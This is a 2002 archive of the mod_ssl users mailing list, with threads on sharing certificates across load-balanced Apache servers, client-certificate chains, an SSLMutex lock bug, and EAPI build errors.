Received: from kursa ([62.189.189.145])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id IAA12201
	for ; Fri, 10 May 2002 08:42:29 +0100
From: "Jeff" 
To: 
Subject: RE: Certificates and Apache/modssl
Date: Fri, 10 May 2002 08:41:21 +0100
Message-ID: <001b01c1f7f6$2961b810$3264a8c0@kursa>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: <002501c1f772$f4efe760$379022a6@wcomnet.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You can install the same certificate on multiple machines.

The certificate should contain the virtual server NAME in the
SSL_SERVER_S_DN_CN field (Common Name) - e.g. www.mysite.com

The browser will check that the certificate and the url match - eg
browser asked for https://www.mysite.com/somepage and the certificate is
issued to www.mysite.com. If the names do NOT match, the user will be
warned that the server name and certificate do not match.

So if you have the same virtual site implemented on multiple servers,
they can happily share the same server cert - you just need to install
the cert files on both servers.

Regards
Jeff

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Greg Jones
Sent: 09 May 2002 17:03
To: modssl-users@modssl.org
Subject: Certificates and Apache/modssl


All-

We are planning on using commercial load balancing software for two
servers
running apache with modssl. Does Apache with modssl require that each
server
have its own certificate or can I use the same certificate on both
servers
since they'll be answering to the same virtual ip? Also, will my
certificate
be based on the virtual ip or the ip of the server. Users will always
get to
the web servers via virtual IP.

Thanks,

Greg Jones
Voice Portal Systems Administrator

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 10:04:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA04983; Fri, 10 May 2002 10:02:57 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id KAA04922; Fri, 10 May 2002 10:01:48 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA27765
	for ; Fri, 10 May 2002 10:01:41 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma027763; Fri, 10 May 02 10:01:35 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA03865
	for ; Fri, 10 May 2002 10:01:34 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA21727
	for ; Fri, 10 May 2002 10:01:33 +0200 (MEST)
Message-ID: <3CDB7E5D.484398A1@bourse.ch>
Date: Fri, 10 May 2002 10:01:33 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Certificates and Apache/modssl
References: <002501c1f772$f4efe760$379022a6@wcomnet.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Greg Jones wrote:
> 
> All-
> 
> We are planning on using commercial load balancing software for two servers
> running apache with modssl. Does Apache with modssl require that each server
> have its own certificate or can I use the same certificate on both servers
> since they'll be answering to the same virtual ip? Also, will my certificate
> be based on the virtual ip or the ip of the server. Users will always get to
> the web servers via virtual IP.

The certificate is assigned to a fully-qualified domain name, not to an
IP address. The idea is that when the browser goes to www.acme.com, it
expects to see a certificate containing "www.acme.com" - thus proving
that the site is really www.acme.com. This is authentication which is
the second but equally important aspect of SSL that everyone forgets
about... (the first aspect is encryption).

Therefore, as long as both your servers are serving the same site, they
can have the same certificate (indeed, they *should* have the same
cert).

There is one other problem, however. Remember that the
public-key/private-key encryption is used only to negotiate the
session-key. Once that has been established, the client and server
communicate using the session-key and the certificate is forgotten. Now,
if you have two servers behind a load-balancer, you have to make sure
that once a client starts an HTTPS conversation with one server, all
subsequent requests are served by the same server. In other words, if
the session-key negotiation takes place on one server but the next
request comes in to the second server, it will be encrypted with a key
known only to the first server. I guess the solution would be to ensure
requests are split on a client basis rather than request basis in the
load balancer.

Rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 10:24:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA06559; Fri, 10 May 2002 10:24:04 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from gw.kredinfo.ee id KAA06335; Fri, 10 May 2002 10:22:18 +0200 (MET DST)
Received: Message by Barricade gw.kredinfo.ee  with ESMTP id g4A8MGV22668
	for ; Fri, 10 May 2002 11:22:16 +0300
Received: from vlads (vlads.kisise [192.168.111.42]) by cs.kisise (8.8.5/SCO5) with SMTP id LAA18416 for ; Fri, 10 May 2002 11:21:10 GMT
From: =?iso-8859-4?B?VmxhZGltaXIgUvxudPw=?= 
To: 
Subject: server ja client cert
Date: Fri, 10 May 2002 11:22:15 +0300
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-4"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-4?B?VmxhZGltaXIgUvxudPw=?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hello,

I need to have a secure channel between server and client
and client authentication using cert.

For a secure channel we have server cert from Thawte.
For client auth I have made my own CA, signed a Intermediate cert
and with that signed a client cert for athentication.

CA -> My Intermediate cert -> Client cert.

Client certs should be verified only whan they are signed by
interediate cert, not CA directly nor by other Intermediate certs
signed by this CA.

So I configured Apache like that:

SSLEngine on
SSLProtocol all -SSLv2
SSLCertificateFile /path/to/thawte_server.cert
SSLCertificateKeyFile /path/to/thawte_server.key
SSLCACertificate /path/to/my_intermediate.crt
SSLVerifyClient require
SSLVerifyDepth 2

and also tried
SSLCertificateChainFile /path/to/my_intermediate.crt+my_ca.crt

With Chainfile configured I get an error: Unable to get a local issuer
certificate.
Withoutit verification fails with reason(199)


Does this configuration require client cert from Thawte?
Has anyone done this? What am I doing wrong?

best wishes,

Vlads

P.S. Sorry about my english

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 10:37:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA07260; Fri, 10 May 2002 10:36:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from raq76.uk2net.com.local id KAA07164; Fri, 10 May 2002 10:34:31 +0200 (MET DST)
Received: from kursa ([62.189.189.145])
	by raq76.uk2net.com.local (8.9.3/8.9.3) with ESMTP id JAA14630
	for ; Fri, 10 May 2002 09:17:36 +0100
From: "Jeff" 
To: 
Subject: RE: Certificates and Apache/modssl
Date: Fri, 10 May 2002 09:16:27 +0100
Message-ID: <002901c1f7fb$106a52e0$3264a8c0@kursa>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: <3CDB7E5D.484398A1@bourse.ch>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> if you have two servers behind a load-balancer, you have to make sure
> that once a client starts an HTTPS conversation with one server, all
> subsequent requests are served by the same server. 

True. AFAIK there are no versions of MSIE that correctly support the
keepalive setting, to unless you are willing to put up with the 
mysterious-1-page-in-5-is-just-blank problem you have to turn keepalive
off, and every request gets renegotiated.


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Owen Boyle
Sent: 10 May 2002 09:02
To: modssl-users@modssl.org
Subject: Re: Certificates and Apache/modssl


Greg Jones wrote:
> 
> All-
> 
> We are planning on using commercial load balancing software for two
servers
> running apache with modssl. Does Apache with modssl require that each
server
> have its own certificate or can I use the same certificate on both
servers
> since they'll be answering to the same virtual ip? Also, will my
certificate
> be based on the virtual ip or the ip of the server. Users will always
get to
> the web servers via virtual IP.

The certificate is assigned to a fully-qualified domain name, not to an
IP address. The idea is that when the browser goes to www.acme.com, it
expects to see a certificate containing "www.acme.com" - thus proving
that the site is really www.acme.com. This is authentication which is
the second but equally important aspect of SSL that everyone forgets
about... (the first aspect is encryption).

Therefore, as long as both your servers are serving the same site, they
can have the same certificate (indeed, they *should* have the same
cert).

There is one other problem, however. Remember that the
public-key/private-key encryption is used only to negotiate the
session-key. Once that has been established, the client and server
communicate using the session-key and the certificate is forgotten. Now,
if you have two servers behind a load-balancer, you have to make sure
that once a client starts an HTTPS conversation with one server, all
subsequent requests are served by the same server. In other words, if
the session-key negotiation takes place on one server but the next
request comes in to the second server, it will be encrypted with a key
known only to the first server. I guess the solution would be to ensure
requests are split on a client basis rather than request basis in the
load balancer.

Rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 13:45:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA20474; Fri, 10 May 2002 13:44:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id NAA20456; Fri, 10 May 2002 13:43:49 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GVW8KT00.65F for ; Fri, 10 May 2002
          12:43:41 +0100 
Message-ID: <3CDBB26F.9090709@itaction.co.uk>
Date: Fri, 10 May 2002 12:43:43 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Certificates and Apache/modssl
References: <002901c1f7fb$106a52e0$3264a8c0@kursa>
Content-Type: multipart/alternative;
 boundary="------------010701010000090300070208"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------010701010000090300070208
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Keep-alive is a pain all round really...

But not necessarily so so as regards renegotiation.

SSL has a concept of session resuming. The first thing exchanged during
an ssl session is the previously negotiated session-id - the startup of
these resumed sessions is a lot cheaper than an initial ssl negotiation.
Some of the better load balancers can take advantage of this session-id
to ensure a client's ssl session, and subsequent resumed sessions go to
the same backend node.

It should be noted that using the same certificate on multiple servers
requires that the related private key is on each server too. commercial
webservers tend not to be too positive about this, they take the high
ground quoting best practice security etc etc, but I can't help feeling
its more to do with pushing more business to the CA's than anything else.

just so long as you remember that anyone with the private key can decode
all your SSL traffic, so take some care over protecting the key from
prying eyes.



Jeff wrote:

>>if you have two servers behind a load-balancer, you have to make sure
>>that once a client starts an HTTPS conversation with one server, all
>>subsequent requests are served by the same server.
>>
>>
>
>True. AFAIK there are no versions of MSIE that correctly support the
>keepalive setting, to unless you are willing to put up with the
>mysterious-1-page-in-5-is-just-blank problem you have to turn keepalive
>off, and every request gets renegotiated.
>
>
>-----Original Message-----
>From: owner-modssl-users@modssl.org
>[mailto:owner-modssl-users@modssl.org] On Behalf Of Owen Boyle
>Sent: 10 May 2002 09:02
>To: modssl-users@modssl.org
>Subject: Re: Certificates and Apache/modssl
>
>
>Greg Jones wrote:
>
>
>>All-
>>
>>We are planning on using commercial load balancing software for two
>>
>>
>servers
>
>
>>running apache with modssl. Does Apache with modssl require that each
>>
>>
>server
>
>
>>have its own certificate or can I use the same certificate on both
>>
>>
>servers
>
>
>>since they'll be answering to the same virtual ip? Also, will my
>>
>>
>certificate
>
>
>>be based on the virtual ip or the ip of the server. Users will always
>>
>>
>get to
>
>
>>the web servers via virtual IP.
>>
>>
>
>The certificate is assigned to a fully-qualified domain name, not to an
>IP address. The idea is that when the browser goes to www.acme.com, it
>expects to see a certificate containing "www.acme.com" - thus proving
>that the site is really www.acme.com. This is authentication which is
>the second but equally important aspect of SSL that everyone forgets
>about... (the first aspect is encryption).
>
>Therefore, as long as both your servers are serving the same site, they
>can have the same certificate (indeed, they *should* have the same
>cert).
>
>There is one other problem, however. Remember that the
>public-key/private-key encryption is used only to negotiate the
>session-key. Once that has been established, the client and server
>communicate using the session-key and the certificate is forgotten. Now,
>if you have two servers behind a load-balancer, you have to make sure
>that once a client starts an HTTPS conversation with one server, all
>subsequent requests are served by the same server. In other words, if
>the session-key negotiation takes place on one server but the next
>request comes in to the second server, it will be encrypted with a key
>known only to the first server. I guess the solution would be to ensure
>requests are split on a client basis rather than request basis in the
>load balancer.
>
>Rgds,
>
>Owen Boyle
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>


--------------010701010000090300070208
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Keep-alive is a pain all round really...



But not necessarily so so as regards renegotiation.



SSL has a concept of session resuming. The first thing exchanged during an
ssl session is the previously negotiated session-id - the startup of these
resumed sessions is a lot cheaper than an initial ssl negotiation.

Some of the better load balancers can take advantage of this session-id to
ensure a client's ssl session, and subsequent resumed sessions go to the
same backend node.



It should be noted that using the same certificate on multiple servers requires
that the related private key is on each server too. commercial webservers
tend not to be too positive about this, they take the high ground quoting
best practice security etc etc, but I can't help feeling its more to do with
pushing more business to the CA's than anything else.



just so long as you remember that anyone with the private key can decode
all your SSL traffic, so take some care over protecting the key from prying
eyes.







Jeff wrote:



  

    
if you have two servers behind a load-balancer, you have to make sure
that once a client starts an HTTPS conversation with one server, all
subsequent requests are served by the same server.
    

  

  

True. AFAIK there are no versions of MSIE that correctly support the
keepalive setting, to unless you are willing to put up with the
mysterious-1-page-in-5-is-just-blank problem you have to turn keepalive
off, and every request gets renegotiated.


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Owen Boyle
Sent: 10 May 2002 09:02
To: modssl-users@modssl.org
Subject: Re: Certificates and Apache/modssl


Greg Jones wrote:
  

  

    
All-

We are planning on using commercial load balancing software for two
    

  

  
servers
  

  

    
running apache with modssl. Does Apache with modssl require that each
    

  

  
server
  

  

    
have its own certificate or can I use the same certificate on both
    

  

  
servers
  

  

    
since they'll be answering to the same virtual ip? Also, will my
    

  

  
certificate
  

  

    
be based on the virtual ip or the ip of the server. Users will always
    

  

  
get to
  

  

    
the web servers via virtual IP.
    

  

  

The certificate is assigned to a fully-qualified domain name, not to an
IP address. The idea is that when the browser goes to www.acme.com, it
expects to see a certificate containing "www.acme.com" - thus proving
that the site is really www.acme.com. This is authentication which is
the second but equally important aspect of SSL that everyone forgets
about... (the first aspect is encryption).

Therefore, as long as both your servers are serving the same site, they
can have the same certificate (indeed, they *should* have the same
cert).

There is one other problem, however. Remember that the
public-key/private-key encryption is used only to negotiate the
session-key. Once that has been established, the client and server
communicate using the session-key and the certificate is forgotten. Now,
if you have two servers behind a load-balancer, you have to make sure
that once a client starts an HTTPS conversation with one server, all
subsequent requests are served by the same server. In other words, if
the session-key negotiation takes place on one server but the next
request comes in to the second server, it will be encrypted with a key
known only to the first server. I guess the solution would be to ensure
requests are split on a client basis rather than request basis in the
load balancer.

Rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
  








--------------010701010000090300070208--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 15:50:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28235; Fri, 10 May 2002 15:49:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from twister.funtex.net id PAA28173; Fri, 10 May 2002 15:48:24 +0200 (MET DST)
Received: (qmail 21687 invoked by uid 513); 10 May 2002 13:48:36 -0000
Date: Fri, 10 May 2002 15:48:36 +0200
From: Guan Yang 
To: modssl-users@modssl.org
Subject: Apache 2.0.36, load balancer and SSLMutex
Message-ID: <20020510154836.A21666@unicast.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
Organisation: Unicast 
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Guan Yang 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I am having some problems with Apache 2.0.36. We have 4 webservers behind a
load balancer (Cisco LocalDirector) that is running mod_ssl. Apache was
configured with a simple ./configure --enable-ssl --enable-proxy.

When I try to run SSLMutex sem on each server, it is able to respond to 3
or 4 requests, but then stops working. There is no response. and log
messages like these appear:

ssl_engine_log:[10/May/2002 15:33:11 29273] [warn]  Failed to acquire
global mutex lock
ssl_engine_log:[10/May/2002 15:33:11 29273] [warn]  Failed to release
global mutex lock
ssl_engine_log:[10/May/2002 15:33:12 29276] [warn]  Failed to acquire
global mutex lock
ssl_engine_log:[10/May/2002 15:33:12 29276] [warn]  Failed to release
global mutex lock
ssl_engine_log:[10/May/2002 15:33:12 29277] [warn]  Failed to acquire
global mutex lock
ssl_engine_log:[10/May/2002 15:33:12 29277] [warn]  Failed to release
global mutex lock

Things only work when I use SSLMutex none, but the documentation advises me
not to do this. Is there anything that I should do?
-- 
Guan Yang / http://unicast.org/ \ guan@unicast.org | +45 7020 6916
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 16:00:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28827; Fri, 10 May 2002 15:59:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from carolina.ub.uu.se id PAA28804; Fri, 10 May 2002 15:58:58 +0200 (MET DST)
Received: by carolina.ub.uu.se with Internet Mail Service (5.5.2232.9)
	id ; Fri, 10 May 2002 15:58:09 +0200
Message-ID: 
From: Klosa Uwe 
To: "'modssl-users@modssl.org'" 
Subject: EAPI!
Date: Fri, 10 May 2002 15:58:08 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2232.9)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Klosa Uwe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've got a problem with the installation of mod_ssl.
I'm using Apache 1.3.24, mod_ssl-2.8.8-1.3.24 and mm-1.1.3.
I'm configuring apache with

EAPI_MM="../mm-1.1.3" \
./configure \
"--with-layout=RedHat7" \
"--enable-module=most" \
"--enable-module=auth_digest" \
"--enable-module=ssl" \
"--disable-module=auth_dbm" \
"--disable-module=auth_anon" \
"--enable-shared=max" \
"--manualdir=/var/www/apache" \
"$@"

After a make and make install, a apachectl configtest creates
several errors, which wants me do recompile several modules 
with the -DEAPI. But this modules was compiled with -DEAPI.

Has anyone a hint for me?

Uwe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 16:07:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA29824; Fri, 10 May 2002 16:06:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from s05128.postbox.be id QAA29559; Fri, 10 May 2002 16:05:39 +0200 (MET DST)
Received: from [194.78.226.46] by postbox.be with ESMTP for modssl-users@modssl.org; Fri, 10 May 2002 16:05:23 +0200
Message-Id: <005b01c1f82b$ba2da400$24aeb381@fuy001>
From: "Frederik Uyttersprot" 
To: 
References: 
Subject: Re: EAPI!
Date: Fri, 10 May 2002 16:05:18 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederik Uyttersprot" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Take a look at the document Apacompile if you haven't already,
http://www.delouw.ch/linux/apache.phtml

Greets.

----- Original Message ----- 
From: "Klosa Uwe" 
To: 
Sent: Friday, May 10, 2002 3:58 PM
Subject: EAPI!


> I've got a problem with the installation of mod_ssl.
> I'm using Apache 1.3.24, mod_ssl-2.8.8-1.3.24 and mm-1.1.3.
> I'm configuring apache with
> 
> EAPI_MM="../mm-1.1.3" \
> ./configure \
> "--with-layout=RedHat7" \
> "--enable-module=most" \
> "--enable-module=auth_digest" \
> "--enable-module=ssl" \
> "--disable-module=auth_dbm" \
> "--disable-module=auth_anon" \
> "--enable-shared=max" \
> "--manualdir=/var/www/apache" \
> "$@"
> 
> After a make and make install, a apachectl configtest creates
> several errors, which wants me do recompile several modules 
> with the -DEAPI. But this modules was compiled with -DEAPI.
> 
> Has anyone a hint for me?
> 
> Uwe
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 16:12:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00143; Fri, 10 May 2002 16:11:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id QAA00064; Fri, 10 May 2002 16:10:08 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id QAA29999
	for ; Fri, 10 May 2002 16:10:01 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma029993; Fri, 10 May 02 16:09:52 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id QAA22349
	for ; Fri, 10 May 2002 16:09:51 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id QAA21809
	for ; Fri, 10 May 2002 16:09:51 +0200 (MEST)
Message-ID: <3CDBD4AF.52D6B900@bourse.ch>
Date: Fri, 10 May 2002 16:09:51 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: EAPI!
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Klosa Uwe wrote:
> 
> I've got a problem with the installation of mod_ssl.
> I'm using Apache 1.3.24, mod_ssl-2.8.8-1.3.24 and mm-1.1.3.
> I'm configuring apache with
> 
> EAPI_MM="../mm-1.1.3" \
> ./configure \
> "--with-layout=RedHat7" \
> "--enable-module=most" \
> "--enable-module=auth_digest" \
> "--enable-module=ssl" \
> "--disable-module=auth_dbm" \
> "--disable-module=auth_anon" \
> "--enable-shared=max" \
> "--manualdir=/var/www/apache" \
> "$@"
> 
> After a make and make install, a apachectl configtest creates
> several errors, which wants me do recompile several modules
> with the -DEAPI. But this modules was compiled with -DEAPI.

You understand that apache needs the extended API (EAPI) to allow
mod_ssl to hook into the openssl library functions? So that's why you
always need to recompile apache if you want to use mod_ssl.

Are you 100% certain you are not trying to load a module which has not
been recompiled with EAPI? (i.e. to prove it - post the "ls -l" of httpd
and all modules in the modules directory).

Rgds,

Owen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 18:37:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA09379; Fri, 10 May 2002 18:36:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id SAA09337; Fri, 10 May 2002 18:35:36 +0200 (MET DST)
Received: from node14.unix.virginia.edu by mail.virginia.edu id aa24671;
          10 May 2002 12:35 EDT
Received: from localhost (jcw5q@localhost)
	by node14.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id MAA25462
	for ; Fri, 10 May 2002 12:35:30 -0400
X-Authentication-Warning: node14.unix.Virginia.EDU: jcw5q owned process doing -bs
Date: Fri, 10 May 2002 12:35:29 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: Apache 2.0.36, load balancer and SSLMutex
In-Reply-To: <20020510154836.A21666@unicast.org>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 10 May 2002, Guan Yang wrote:

> When I try to run SSLMutex sem on each server, it is able to respond to 3
> or 4 requests, but then stops working. There is no response. and log
> messages like these appear:
>
> ssl_engine_log:[10/May/2002 15:33:11 29273] [warn]  Failed to acquire
> global mutex lock

This is a known bug that should be fixed in a few days.  Please see
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=8124

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 10 18:49:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA10085; Fri, 10 May 2002 18:48:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Aep-Mail.aep-net.com id SAA10053; Fri, 10 May 2002 18:47:56 +0200 (MET DST)
Received: from Aep-Mail.aep-net.com (unverified) by Aep-Mail.aep-net.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Fri, 10 May 2002 17:51:04 +0100
content-class: urn:content-classes:message
MIME-Version: 1.0
